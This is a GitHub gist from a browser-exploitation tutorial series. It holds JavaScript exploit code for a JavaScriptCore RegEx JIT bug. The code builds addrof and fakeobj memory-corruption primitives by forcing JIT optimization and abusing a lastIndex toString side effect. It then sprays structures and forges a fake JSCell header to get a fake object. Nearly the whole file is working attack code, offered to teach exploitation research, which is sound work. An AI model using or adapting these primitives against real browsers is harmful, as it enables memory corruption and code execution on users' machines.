Skip to content

Instantly share code, notes, and snippets.

@LiveOverflow LiveOverflow/test.js
Last active Jul 11, 2019

Embed
What would you like to do?
Revisiting JavaScriptCore Internals: boxed vs. unboxed - browser 0x06
// based on: https://github.com/LinusHenze/WebKit-RegEx-Exploit
// tutorial: https://liveoverflow.com/tag/browser-exploitation/
// playlist: https://www.youtube.com/watch?v=5tEdSoZ3mmE&list=PLhixgUqwRTjwufDsT1ntgOY9yjZgg5H_t
// addrof primitive
function addrof(val) {
var array = [13.37];
var reg = /abc/y;
// Target function
var AddrGetter = function(array) {
//reg[Symbol.match]();
"abc".match(reg);
return array[0];
}
// Force optimization
for (var i = 0; i < 10000; ++i)
AddrGetter(array);
// Setup haxx
regexLastIndex = {};
regexLastIndex.toString = function() {
array[0] = val;
return "0";
};
reg.lastIndex = regexLastIndex;
// Do it!
return AddrGetter(array);
}
// fakeobj primitive
function fakeobj(dbl) {
var array = [13.37];
var reg = /abc/y;
// Target function
var AddrSetter = function(array) {
//reg[Symbol.match]();
"abc".match(reg);
array[0] = dbl;
}
// Force optimization
for (var i = 0; i < 10000; ++i)
AddrSetter(array);
// Setup haxx
regexLastIndex = {};
regexLastIndex.toString = function() {
array[0] = {};
return "0";
};
reg.lastIndex = regexLastIndex;
// Do it!
AddrSetter(array);
return array[0];
}
for(var i=0; i<0x2000; i++) {
test = []
test.x = 1
test['prop_'+i] = 2
}
buf = new ArrayBuffer(8);
u32 = new Uint32Array(buf);
f64 = new Float64Array(buf);
fake = {}
//fake.a = 7.082855106403439e-304
u32[0] = 0x00001000 // StructureID
u32[1] = 0x01082103 // JSCellHeader flags
fake.a = f64[0]
u32[0] = 0x41414141 // butterfly
u32[1] = 0x42424242
fake.b = f64[0]
fake.c = 1337
fake_adr = addrof(fake)
f64[0] = fake_adr
u32[0] += 0x10 // shift address forward by 16 bytes
hax_addr = f64[0]
hax = fakeobj(hax_addr)
print(hax.length)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.